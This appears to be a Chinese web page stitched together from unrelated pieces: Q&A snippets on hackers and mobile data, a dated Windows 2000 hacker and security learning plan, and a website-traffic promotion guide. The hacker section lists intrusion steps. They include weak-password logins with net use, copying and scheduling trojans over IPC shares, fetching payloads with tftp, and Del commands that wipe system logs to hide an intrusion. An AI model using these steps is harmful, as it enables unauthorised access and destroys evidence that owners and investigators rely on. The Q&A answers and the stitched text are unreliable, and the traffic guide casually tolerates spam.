把流量数据关掉黑客是不是相当于一个废物
这是有前提的,如果在黑客进攻前是对的,进攻后他可能已经获取了充分的信息,断网的意义就不大了,如果只获取了一部分,断网也许有用,但是肯能你没有权限去关流量了,最好是断电,
黑客会通过流量入侵吗。就这一个问题。。。。
不能,你听那个脑残讲的可以通过流量入侵、只有ddos攻击这一说法和流量攻击相似
没有流量网络黑客是不是废物一个
没有流量网络感染病毒那么黑客是不是就不能正常工作了,那个是不是就变成废物一个人了,但是否定的,对于黑客来说,他有很多手段可以让你的社会。,也不一定非要通过网络比如说他可以通过网吧发送电子邮件的形式,这样叫他就不需要使用任何的流量了。
有关黑客的问题
基础:
如何去学习
·要有学习目标
·要有学习计划
·要有正确的心态
·有很强的自学能力
学习目标
·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等)
·2.自己目前的水平和能力有多高
·能简单操作windows2000
·能简单配置windows2000的一些服务
·能熟练的配置Windows2000的各种服务
·能熟练配置win2000和各种网络设备联网
·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
·能配置cicso,huawei,3com,朗迅等网络设备
·会简单编写C/C++,Delphi,Java,PB,VB,Perl
·能简单编写Asp,Php,Cgi和script,shell脚本
·3.必须学会不相信态度,尊重各种各样的能力
·不要为那些装模做样的人浪费时间
·尊重别人的能力,
·会享受提高自己能力的乐趣.
·在知道了自己的水平和能力之后就要开始自己的目标了
·--------安全专家
·--------黑客
·--------高级程序员
·黑客是建设网络,不是破坏网络, 破坏者是骇客;
·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的;
·因为懂得如何入侵才知道如何维护
·因为懂得如何维护才更要了解如何入侵
·这是 黑客与安全专家的联系
·但,他们都是在会编程的基础上成长的!
·下面我们开始我们的学习计划!
学习计划
有了学习计划才能更有效的学习
安全学习计划
不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s
erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少
最基础
·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2
000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件
,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用
域的定义
·b.知道如何开,关机 知道注销的用处
·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具里面各个组件的定义
·e.学会应用命令提示符cmd(dos)
·f.知道计算机管理里面的各个选项的不通
·g.知道win2000强大的网络管理功能
·h.能非常熟练的操作win2000
·i.知道IP地址,子网掩码,网关和MAC的区别
进阶
·A.配置IIS,知道各个选项的作用
·B.配置DNS,DHCP
·C.配置主控制域,辅助域
·D.配置DFS
·E.配置路由和远程访问
·F.配置安全策略IPSEC
·G.配置service(服务)
·H.配置磁盘管理,磁盘分额
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安装与简单配置
·K.交换机的安装与简单配置
·L.常见的VPN,VLAN,NAT配置
·M.配置常见的企业级防火墙
·N.配置常见的企业级防病毒软件
高级
·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分
·你作到了吗??
·如果你做到了,足以找到一份很不错的工作!
配置负载均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三层交换网络 ·
·配置各种复杂的网络环境
·能策划一个非常完整的网络方案 ·
·能独自组建一个大型的企业级网络 ·
·能迅速解决网络中出现的各种疑难问题
结束
·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标!
·可以找到一份非常好的工作
·不会再因为给女朋友买不起玫瑰而发愁了!
安全:
导读
·系统安全服务(SYSTEM)
·防火墙系统(FIREWALL)
·入侵检测(IDS)
·身份验证(CA)
·网站监控和恢复(WEBSITE)
·安全电子商务(E-BUSINESS)
·安全电子邮件(E-MAIL)
·安全办公自动化(OA)
·Internet访问和监控(AC)
·病毒防范(VIRUS)
·虚拟局域网(VPN)
系统安全服务
·系统安全管理
·系统安全评估
·系统安全加固
·系统安全维护
·安全技能学习
系统安全管理
·信息系统安全策略
·信息系统管理员安全手册
·信息系统用户安全手册
·紧急事件处理流程
系统安全评估
1、系统整体安全分析
· 分析用户的网络拓扑结构,以找出其结构性及网络 配置上存在的安全隐患。
· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。
· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用
2、主机系统安全检测
· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。
· 对于特定的系统,采用特别的工具进行安全扫描。
· 根据经验,对系统存在的漏洞进行综合分析。
· 给出系统安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的危险。
· 给出修复安全漏洞的建议
3、网络设备安全检测
· 通过对网络进行安全扫描,以发现网络设备的安全漏洞。
· 根据经验,对网络设备存在的漏洞进行综合析。
· 给出网络设备安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的险。
· 给出修复安全漏洞的建议。
安全系统加固
·为用户系统打最新安全补丁程序。
·为用户修复系统、网络中的安全漏洞。
·为用户去掉不必要的服务和应用系统。
·为用户系统设置用户权限访问策略。
·为用户系统设置文件和目录访问策略。
·针对用户系统应用进行相应的安全处理。
安全系统维护
·防火墙系统维护,安全日志分析
·IDS系统维护,安全日志分析
·VPN系统维护,安全日志分析
·认证系统维护,安全日志分析
·服务器、主机系统,安全日志分析
·其它各类安全设施维护及日志分析
安全技能培训
·网络安全基础知识
·网络攻击手段演示和防范措施
·防火墙的原理和使用
·VPN的原理和使用
·漏洞扫描工具的原理和使用
·IDS(入侵检测系统)的原理和使用
·身份认证系统的原理和使用
·防病毒产品的原理和使用
·系统管理员安全培训
·一般用户安全培训
防火墙系统
·防火墙的定义
·防火墙的分类
·包过滤防火墙
·应用网关防火墙
·状态检测防火墙
·一般企业防火墙配置
·政府机构防火墙配置
·涉密网络保密网关配置
·高可用性和负载均衡防火墙系统
·高速防火墙系统
防火墙的定义
·用以连接不同信任级别网络的设备。
·用来根据制定的安全规则对网络间的通信进行控制
防火墙的分类
·包过滤 (Packet Filters)
·应用网关 (Application Gateways)
·状态检测(Stateful Inspection)
包过滤防火墙
·包 过 滤 技 术
·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网
络层进行包检查与应用无关。
· 优 点
· 具有良好的性能和可伸缩性。
· 缺点
· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。
应用网关防火墙
·应用网关技术
·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应
用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。
· 优点
· 安全性比较高。
· 缺点
· 1、该方法对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从
防火墙系统到服务器,这会严重影响性能。
· 2、防火墙网关暴露在攻击者之中。
· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持
新应用方面存在问题。
检测状态防火墙
· 属第三代防火墙技术,克服了以上两种方法的缺点,引入了OSI全七层监测能力,同时
又能保持 Client/Server的体系结构,也即对用户访问是透明的。
· 防火墙能保护、限制其他用户对防火墙网关本身的访问。
· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以
从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维
持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸
缩性的解决方案。
入侵检测系统
·处理攻击时遇到的典型问题
·解决入侵的方法和手段
·基于网络的入侵检测
·基于主机的入侵检测
·入侵检测系统典型配置
处理攻击时遇到的问题
·获得的信息不足
·不知到网络上发生了什么事。
·无法判定系统是否已经被入侵。
·信息不准确
·人员少
·没有足够的人员维护管理。
·缺乏规范的处理程序
·发现攻击时如何反应?
·下一步该如何处理?
解决入侵的方法和手段
·采用入侵实时入侵监控系统(IDS)
·对系统、网络中发生的事件进行实时监控。
·当发生入侵事件时能即时反应。
·对入侵事件进行详细记录并跟踪。
基于主机的入侵检测
·软件模块安装在包含有重要数据的主机上
·监视操作系统的日志以发现攻击的特征。
·监视代理所处主机上的所有进程和用户.
·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等
。
·当新的日志产生时,为了减小对CPU的影响,代理程序暂时中断。
基于网络的入侵检测
·软件安装在专门的主机上,放置于关键的网段
·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。
·分析数据包以判断是否有黑客攻击。
·监视网段上的所有数据。
·对网络的流量无任何影响。
·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻击。
身份认证系统
·用户身份认证的方法
·不同认证方法的安全级别
·用户身份认证的常用方式
·解决问题的方法
·目前比较成熟的双因素认证方法
用户身份验证
·你知道的一些东西
· 密码, 身份证号,生日
·你有的一些东西
· 磁卡, 智能卡,令牌, 钥匙
·你独有的一些东西
· 指纹,声音,视网膜
密码是不安全的
·可以破解密码的工具太多
·大多密码在网络中是明文传输的
·密码可以网络离线时被窥测
·密码和文件从PC和服务器上被转移了
·好记的密码容易被猜到,不易猜测的密码又太难记
解决方法
·使用混合的工具:如IC卡+PIN
网站监控与恢复系统
·典型的Web服务器应用
·Web服务器存在的安全问题
·网站安全解决方法
典型web服务器应用
·Internet--路由器--防火墙--web站点
· |
· |
· 内部网
·所有的放在防火墙后面
Web服务器存在的安全问题
· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏
洞成为了网站被黑的主要问题。
· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.)
· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。
网站安全
·采用Web服务器监控与恢复系统
·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。
电子商务安全系统
·典型的电子商务应用
·电子商务中存在的安全问题
·电子商务的安全解决方法
·实时数据交换系统
典型电子商务应用
·Internet---防火墙---Web服务器
· || |
· || |
· 内部网(数据库)
电子商务中存在的安全问题
·1、Web服务器端
·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH
P应用中存在着潜在的漏洞。
· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使
用者的信心。
· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐
号和口令。
· 可能通过控制Web服务器,来攻击内部数据库。
电子商务中存在的安全问题
·2、SSL协议
·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览
器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强
度SSL加密链接。
· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道
只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信
息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。
电子商务的安全解决方法
·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。
· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非
法改动。
· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相
连。
· 在客户机和服务器端安装SSL代理,从而获得128位的高强度加密通道
实时数据交换系统
·将系统外部 Web服务器和内部应用Web服务器物理隔开.
·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据
库连接。
·外部用户通过http访问位于DMZ区内的一般Web服务器。
·当进行交易时,用户需访问位于内部网内的应用服务器。
·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https
协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使
用该数据重新发起https连接到实际的内部应用Web服务器.
·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。
·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息
安全电子邮件系统
·电子邮件的安全问题
·安全电子邮件的解决方法
·一个安全邮件的使用过程
电子邮件的安全问题
·如何保证发送的敏感信息不被泄漏
·如何保证发送的信息不被篡改
·如何确认发件人的真实身份
·如何防止发件人的抵赖行为
安全电子邮件的解决方法
·将PKI体系应用到邮件系统中
·邮件的加密和解密以实现数据的保密。
·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系。
·支持128bit对称密钥算法和1024bit公开密钥算法。
办公自动化系统的安全问题
· 如何保证发送的敏感信息不被泄漏
· 如何保证发送的信息不被篡改
· 如何确认发件人的真实身份
· 如何防止发件人的抵赖行为
安全办公自动化系统的解决方法
·将PKI体系应用到办公自动化系统中
·工作流信息的加密和解密以实现数据保密
·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系
·支持128bit对称密钥算法和1024bit公开密钥算法。
Internet访问及控制系统
·Internet使用存在的问题
·Internet使用的解决方法
·内容缓存系统
·Internet站点过滤系统
Internet访问存在的问题
·Internet接入带宽不足,访问比较慢。
·大量的用户访问相同的内容,造成带宽的进一步拥挤。
·在上班时间里大量的Internet访问是与业务无关的。
·有人使用公司的Internet系统访问色情网站。
·有人使用公司的Internet系统访问反动站点。
·管理人员无法知道Internet系统的使用情况。
Internet访问的解决方法
· 对于问题一,采用内容缓存系统。
· 对于问题二,采用Internet 站点过滤系统。
内容缓存系统
·1、Client 发起http连接请求
·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。
·3、若无,则Proxy根据请求向目的服务器发起请求。
·4、Web服务器将内容返回到Proxy服务器。
·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。
Internet站点过滤系统 (一)
·1、Client 发起http连接请求
·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。
·3、WebSense 将审查结果返回到防火墙。
·4、防火墙根据其策略决定是否让该连接通过。
Internet站点过滤系统 (二)
·1、Client 发起http连接请求
·2、Proxy 受到请求后将URL送到WebSense Server检查。
·3、Proxy根据返回的结果决定是否接收该连接请求。
病毒防范系统
· 互连网时代对防病毒系统的要求
· 计算机病毒解决方法
· 典型病毒防范系统部署
互联网时代对防病毒系统的要求
· 由于计算机的联网使用,使得病毒传播的途径大为增多:网络文件共享、电子邮件、Int
ernet文件下载,传播速度也大为加快。
· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。
· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安
全问题。
· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主
机被他人控制。
计算机病毒解决方法
· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端
(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus
Notes)、Internet接入系统(Proxy、Firewall)等。
· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从
而使得整个网络系统的病毒特征码得到快速更新。
· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有
的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。
VPN(虚拟私有网)
· 数据加密分类
· 物理线路加密
· 数据链路加密
· 网络层加密—IPSec
· 传输层加密—SSL
数据加密类型
·物理层-物理层 物理线路加密
·数据链路层-数据链路层 (路由器访问)
·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F
·网络层-网络层(路由器 防火墙 主机)
·在网络层 (如IP)进行加密 IPSec
·传输层-传输层 (对TCP进行加密 SSL)
·应用层-应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH)
物理线路加密
· DDN 加密机
· 帧中继加密机
· 异步拨号Modem
· ISDN线路密码机
· ATM加密机
注:传输层加密
·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书,
它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建
立起一个端到断的安全会话。
·SSL代理—128位的高强度加密模块
结束语·恭喜你:
·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了!
·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的
色彩!
黑客编:
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping
必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp
·Icmp
·Udp
·tcp
开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具
高级
·自己编写专用的黑客工具
·自己发现系统漏洞
黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置
弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接
·在sql的sa弱口令,可以用sql连接器直接 ·登陆
后门木马
·如果有ipc$共享,可以copy过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行
密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码
缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32
Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码
嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris
欺骗攻击
·例如:
·运用arp欺骗攻击
伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行
社会工程学
·例如:
·QQ聊天诱惑
·EMAIL信息
·电话
·诱惑
拒绝服务
·例如:
·Dos攻击
·Ddos攻击
利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------跳板(肉鸡)---目标
路由器漏洞
·如:
·原始密码
·程序漏洞
防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效
·利用防火墙的模块漏洞
unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解
精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具
清除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*
·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt
如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子
黑客
·当你完全掌握这些后
·你就成为了一名小黑客
高级
·编写自己的黑客工具
·发现系统漏洞
高级黑客
·目前你足以成为一个高级黑客了
真正的黑客
·精通各种网络协议
·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题
结束
黑客靠流量是不是
你这里说的流量是什么?对黑客来讲,这其实也不重要。
所谓的黑客是指,在不经过主人允许的情况下,恶意攻击篡改数据库信息的一类人。
所以对黑客来讲,流量对他来说没有什么用。
一般而言,只要是连接上了互联网,网络通信正常的话,黑客就可以通过网线,让爬虫来进攻你的电脑,获取你电脑里的资料信息等。
所以这里说对黑客,一个重要的其实是网络。而并不是流量。
为什么我的网站访问量小呢!
如何提高网站的访问量
如何增加访问量,吸引更多的回头客,绝对是困扰每一位站长的难题。要让别人知道你的站点,必须做网站推广。网站推广有三种方式,一是在一些大型的,知名度高的站点做链接(广告),二是在网络上重要的检索引擎上登记企业站点的网址和内容提要,使INTERNET用户都可以通过检索引擎查询到企业的网址,最大的检索引擎有 Yahoo、google、Infoseek、Lycos等,国内较知名的有Sina.com、 Sohu.com 、China.com、163.com、fm365.com 、soucool.com 等;第三是与行业相关的网站建立连接或发布信息。
第一步:合适的选材是成功的开始:如果主页只是介绍您的个人、家庭或者一些简单无聊的东西,那么网站今后会有多少朋友来访问呢?除非您是名人。这是要慎重考虑的问题,不要等网站建成了才发现不合适就不好了。因此,开始做之前就一定要想想:
建立个人主页一般都出于两大目的,兴趣和金钱,兴趣方面就不用多说了,这类个人主页如果没有长期的规划、用心的维护,很容易无疾而终(97年建立的个人网站现在99%都已经消失了)。我只对单为了挣钱而建站的朋友提供一些小小的建议。如何利用网站挣钱,目前只有靠广告赚钱,这必须依赖于相对高的访问量,其实如果您的主页的访问量<5000是没有多少意义的,但如何提高访问量的关键又在选材,所以,首先要把主页的题材把握准。色情,黑客破解,下载(包括各种软件,书籍,mp3等)这是绝对保证访问量的首选主题,但其中非法、版权等总是也是大家要注意的哟,我有一些朋友可是收到过律师的警告信哟。其中黑客需要很高的技术成分(当然在网上也有许多现成的),下载呢又有赖于硬件条件,只有色情是一个捷径,但它却要冒很大的风险,现在的广告商差不多对它都关上了大门。如果您觉得上面三个都不可行,那么我给您介绍一下第二梯队的几种网站:游戏,新闻,免费,赚钱,教学,影音和其他专题性网站。游戏不用说,非常可行,但需要大量的时间和精力。免费就比较简单了,只需要多听多看多拷贝就能搞定,但这类网站实在太多,很难再出头。新闻非常费神,简直就是卖苦力。赚钱网站可以说是最近最火的网站,一夜之间冒出很多,是否要选择就看您的实力了。教学网站有一定的技术性,普通网友恐难胜任。影音类在前一段时间也相当热门。最后是专题网站,它把兴趣结合了进来,使工作热情升高了,浏览面却局限在某一专题之中,但有利于结交一些志同道合的朋友。
下面是美国《个人电脑》杂志(pc magazine)评出的99年度排名前100位的全美知名网站的十类题材,有一些参考价值。
第1类:网上求职
第2类:网上聊天/即时信息/ icq
第3类:网上社区/讨论 / 邮件列表
第4类:计算机技术
第5类:网页/ 网站开发
第6类:娱乐网站
第7类:旅行
第8类:参考 /资讯
第9类:家庭/教育
第10类:生活/时尚
每个大类都可以继续细分,比如娱乐类再分为体育 /电影/ 音乐大类,音乐又可以按格式分为mp3,vqf,ra,按表现形式分古典,现代,摇滚等。以上都只是最常见的题材,还有许多专业的,另类的,独特的题材可以选择,比如中医,热带鱼,天气预报等等,同时,各个题材相联系和交叉结合可以产生新得题材,例如旅游论坛(旅游+讨论),经典入球播放(足球+影视)按这样分下去,题材可以有成千上万个,你不会再为题材重复,难以选择而烦恼了吧:)
友情提示:热门的话题是永恒的主题。
就拿下载站来说,只要有特色始终都会有固定访客,但新站不断出现,如您建得平平无味,同样的下载站,别人凭什么要到您这里来呢?
做热门类网站时一定要多留心重大新闻—— 比如最近俄罗斯的核潜艇事件,注意身边的话题—— 比如最近的彩电价格大战,多看看各大排行榜前五十位的网站—— 这可知道现在的网友想看些什么,以上这些都是不错的选材,取别人成功的经验,加上自己的独立见解与想法,把它们充分融合到你的“家”里,这样,您的网站才会与众不同,加上适当的宣传推广,计数器一定飞涨。
现在,您是否定好了主题了?也许您觉得我说的题材都不好,也许您想的题材比我的更好,那简单,怎么都行,总之怎么尽快红火怎么来,但不要选违法、色情或者有版权因素的主题,否则到时候被查封,可就得不偿失了。
第二步:网站设计、制作与推广是通向成功之门。关于网站的设计与制作这可是一个仁者见仁的东东了,这里包括的内容实在太多了,可以出几本书了,而且还有更多的技术问题。本文在这里主要讲如何推广的问题。
登录搜索引擎—— 不过让别人能搜索到您的机会还是相当可怜的;
聊天室告知网友—— 这可要适当哟,大多了别人会反感的;
在bbs、论坛广而言之—— 经常去比较有名的论坛、bbs去吹捧,往往也有意想不到的效果;
在访问量较高的网站留言—— 这可是一个不错的主意,留言要注意把您暴光您网站里的特别之处;
利用e-mail广发邀函—— 平常注意搜集一些有用的e-mail地址,发一些邀请函,千万要注意您邮件中的内容,不要让人反感,切记不可多用,偶尔一次半次好了,否则就成了垃圾邮件,这个可是目前网友们最反感的了,但为了宣传,用一下也无妨;
与优秀网站交换连接—— 不过现在的大站一般是不开放这个服务的,您想人人都这样做那他们的连接不是要写几大页??!!不过也有例外,就是您如果长期向他们提供有用信息或者免费服务那就不同了,与网友间多多交换连接,这样对您的宣传很有帮助;
参加广告交换宣传—— 交换连接也许比较难,但参加广告交换网就比较容易了,现在有些文本的广告交换网可以达到1:10或者更高,只要您用的标题够吸引人,带来的访问量也不错;
经常参加一些网络相关活动—— 比如网页制作比赛,网络知识比赛,虽然这种活动并不是很多,但只要有,你就要去参与,即使感觉上有点困难,但只要做了,总会有点收获。我觉得参加这类活动不单是为了得奖,最重要的是他们的推广活动,同时,您也可以从这些优秀的网站中取到不少的经验;
如果您有足够的能力还可以进行以下活动:在报刊里发表文章、组织有奖竞赛活动、提供免费的服务(如利用服务器的支持,用cgi程序为大家提供一些免费服务)等等,总之要利用一切可以利用的方法进行,而且要量力而为,不能象某些商业网站那样“烧钱”,记住您必竟还是个人网站。
第三步:留住您的访客让您的网站长盛不衰。好不容易吸引过来的访客,来看了一次就不来了,心里也不好受吧,其实只要你做到以下的方面,他们不回头也难呢:
1、注意普遍的上网情况与使用的浏览器。要考虑到现在普通朋友大多数还是用的拨号上网速度有限,页面不能做得又大又长,也不要用太多的java等等的技术,这可不是所有的的浏览器都支持,在一个不支持的浏览器里也许会得到一个极差的效果。
2、页面美观,内容第一,及时更新。美观,就好象一个人打扮漂亮一样,给人眼前一亮,怎么不回头?同时一个网站如果里没有吸引人的内容,别人是不会有兴趣的,还有好的内容但也得高速更新呀,否则网友每次来看到同样的面孔还有什么兴趣?
3、结构清晰,易于导航。网站结构象人的骨骼,构筑起网站的整体框架,虽然表现形式各异,但让人迷失终归不好,尤其是内容丰富的网站更应注意。
4、申请好记的域名。使用好记的域名让人过目不忘,不用作bookmark也忘不掉。
5、结交网友以诚待人。网上虽然可以掩饰自己的身份与背景,但若不付出一点真诚,别人也不会和你交心。每有朋友来信,我总是认认真真回复,尽我所能给予帮助。那些往来密切的都是一样的热心人,虽然不多,却常常给你最实实在在的帮助!珍惜这份有缘相聚的时光,她可能是你上网的最大收获。
6、与网站联盟。联合两三个网站,结成小小的联盟,相同的栏目整合后交由一人设计,其它的站点可建立镜象或连接。每个成员保有其特色栏目,照常发挥。这样既照顾个人优势,又不会破坏自主的独立性,也不必要求个个“十项全能”,时间、精力、空间都能得到充分的利用。这样集合整体优势,留住访客不是更容易?
7、建立邮件列表。也许您的访客有这样或者那样的原因不能去您的网站或者忘记了您的网站,但如果您有一份相当不错的邮件列表的话,那可就会勾起他(她)的记忆,让您的访客虽然没有时间去您那里,也知道您在努力,当然如果有他们感兴趣的内容,何愁他们不来?
提高网站访问量的策略
第1章.
+ 提高网站访问量是一个长期的工作。
+ 提高网站访问量需要针对某个具体的访问群体。
+ 提高网站访问量需要毫不停顿的改善网站。
第2章. 评估现时的访问量
(一)我们必须评估现在的访问量,对月、周、日、小时、综合访问统计、综合排名进行分析。
1、现时的访问量
一般的周访问统计的数据包含以下内容
时间 访问人数 比率 图示
2、一般的月访问统计的数据包含以下内容
时间 访问人数 比率 图示
9月30日 208 1.79%
3、一般的小时访问统计的数据包含以下内容
4、一般的综合访问统计的数据包含以下内容
(1)浏览器使用统计
浏览器 使用人数 比率 图示
(2)操作系统使用统计
操作系统 使用次数 比率 图示
(3)最近访问者来路统计
访问日期 访问时间 URL
(4)综合排名
开始统计日期 总统计天数 总浏览人数 平均每天访问人数 站点性质 目前总排名 今日总浏览人数 预计本日浏览人数 最高一天浏览量
(二)流量分析
通过月、周、日,我们可以清晰地分析出一年中哪几个月、一周中哪几天、一日中哪些时段访问量较大,针对这些访问量较大的时间,我们可以对网站更新、上传做相应的布署;如通过对每月访问总量统计可知:几月份访问量较大,其原因是什么,据此改版;如通过周访问统计可知:周几的访问量的高低分布,若再联系小时访问统计,可得出以下访问者习惯的猜测;如通过最近访问者来路统计可知,访问者多为熟客还是第一次来访,白天还是晚上、直接还是间接访问本站,……
一般情况下,一个站点的流量由两部分组成,一部分为固定的访客,另一部分是新的访客。固定的访客是站点流量固定增加的保证,而新的访客是站点流量随时增加的保证。一般来说,固定访客的来源是“收藏夹”,也就是访客把您的网站作上了标记,以便下次的访问。而新的访客就会来自网络的四面八方了,最有可能的是:1、其它站点(163169)的连接,2、在搜索引擎(Yahoo、Sohu)搜索到的。总之,考虑访客来自那里,可以确定自己的宣传策略是否成功。
过去,想知道自己站点客源的分布是件不可能的事情,而随着相关免费服务的推出,使得我们可以随时了解站点的访问情况。目前国内两大流量分析站点网易和Topcn都能提供相关的服务,但因为设置的不同,使得两个站点在分析同一个站点时,发生结果相差很远的情况。所以,当我们在选择国内此类服务时,最好再申请一个国外同样的服务,这样,结果相对来说正确些。
流量分析服务能让我们确定访客是如何找到您的网站的,而另外的访客为什么没有找到您的网站。比如,当我们把站点登陆到搜索引擎后,通过分析没有发现访客来自那里,那么你要确定自己的站点是否成功的列在搜索引擎目录里。如果发现没有,那么我们就可以重新进行登记。
以上的分析使我们对网站的访问量、访问群体做出科学地评估,从而清楚了解哪些人、多在什么时间、在什么地方、通过什么途径来访问我们的网站。这些流量分析是开展提高网站访问量工作的第一步,决不能省略的第一步!
第3章. 提高访问量的策略
